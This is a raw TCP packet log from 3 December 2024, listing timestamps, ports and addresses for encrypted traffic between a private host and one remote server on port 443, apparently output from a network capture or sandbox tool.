Dec 3, 2024 14:27:58.248872042 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:58.249020100 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:58.249274969 CET	49761	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:58.249289989 CET	443	49761	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:58.259241104 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:58.259283066 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:58.259351969 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:58.259638071 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:58.259646893 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.118823051 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.118918896 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.119489908 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.119499922 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.119672060 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.119678020 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.119790077 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.119800091 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.715497017 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.715625048 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.718916893 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.718934059 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.719685078 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.719705105 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.720127106 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.720144033 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.754755974 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.754838943 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:59.754839897 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.754905939 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.755578995 CET	49773	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:59.755605936 CET	443	49773	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:00.317893028 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:00.317959070 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:00.317986012 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:00.318022966 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:00.318027973 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:00.318120003 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:00.318504095 CET	49774	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:00.318526030 CET	443	49774	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:09.885730982 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:09.885768890 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:09.885864973 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:09.886475086 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:09.886490107 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:10.408143044 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:10.408221960 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:10.408471107 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:10.408720016 CET	49804	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:10.408740997 CET	443	49804	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.367358923 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.367819071 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.368408918 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.368427038 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369033098 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369034052 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369049072 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369064093 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369139910 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369152069 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369162083 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369168043 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369255066 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369278908 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369283915 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369649887 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369772911 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.369796038 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369911909 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.369997978 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370012999 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370059013 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370074987 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370119095 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370186090 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370203972 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370273113 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370438099 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370448112 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370454073 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370456934 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370515108 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370528936 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370649099 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370661974 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370703936 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370721102 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370791912 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370795965 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370917082 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370929956 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.370964050 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.370975971 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371021986 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371032953 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371085882 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371098995 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371124983 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371135950 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371200085 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371212006 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371258974 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371265888 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371270895 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371274948 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371294022 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371303082 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371444941 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371444941 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371459961 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371478081 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371489048 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371555090 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371567011 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371575117 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371581078 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371592999 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371597052 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371671915 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371685028 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371704102 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371715069 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371768951 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371789932 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371802092 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371809959 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371829033 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371968985 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.371979952 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.371997118 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372008085 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372179031 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372199059 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372289896 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372299910 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372317076 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372322083 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372373104 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372385025 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372399092 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372406006 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372468948 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372476101 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372481108 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372569084 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372581005 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372586012 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372590065 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372605085 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372613907 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372665882 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372673988 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372713089 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372725964 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372767925 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372778893 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372808933 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372822046 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372864962 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372878075 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372909069 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.372920990 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.372925997 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373020887 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373034954 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373090029 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373104095 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373131990 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373147011 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373183966 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373195887 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373229980 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373241901 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373289108 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373300076 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373336077 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373347044 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373378992 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373384953 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373495102 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373495102 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373507023 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373549938 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373559952 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373601913 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373611927 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373645067 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373656034 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373691082 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373704910 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373749018 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373759985 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373779058 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373789072 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373828888 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373840094 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373846054 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373918056 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373929977 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.373964071 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.373975039 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374007940 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374022007 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374054909 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374066114 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374103069 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374114990 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374145031 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374156952 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374200106 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374212980 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374243975 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374253988 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374373913 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374373913 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374387026 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374428988 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374439955 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374479055 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374490023 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374526978 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374542952 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374568939 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374579906 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374624014 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374635935 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374666929 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374677896 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.374711037 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374757051 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374804974 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374840021 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374882936 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374916077 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.374969959 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.375008106 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.375051975 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.375099897 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.415327072 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.415838003 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416001081 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416049957 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416084051 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416126013 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416156054 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416188955 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416224003 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416254044 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.416279078 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.459335089 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.460367918 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460442066 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460505962 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460546970 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460587978 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460623980 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460669994 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460704088 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.460753918 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.503333092 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.503895998 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.503973007 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504030943 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504070997 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504112005 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504163027 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504205942 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504249096 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.504312992 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.551326036 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.551760912 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.551852942 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.551930904 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.551970005 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.552032948 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.552073956 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.552112103 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.552151918 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.552181005 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.595336914 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.595793009 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.595886946 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.595952034 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.595993042 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.596045971 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.596080065 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.596160889 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.596180916 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.596187115 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.610586882 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.610872984 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.610884905 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.610898018 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.610970020 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611016035 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611079931 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611090899 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611102104 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611119986 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611171007 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611186028 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611279011 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.611351013 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655333042 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.655658007 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655690908 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655715942 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655771971 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655812979 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655863047 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.655889988 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.656109095 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.656186104 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.656241894 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.699338913 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.699624062 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.699676991 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.699714899 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.699767113 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.699820042 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.699837923 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.700061083 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.700148106 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.700195074 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.700308084 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.731514931 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.732016087 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.732036114 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.736718893 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.736833096 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.736912966 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.736949921 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.737138033 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.737179041 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.737222910 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.737268925 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.737337112 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.737380981 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.783333063 CET	443	49802	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:11.785048962 CET	49802	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:11.785108089 CET	49802	443	192.168.2.5	149.154.167.220
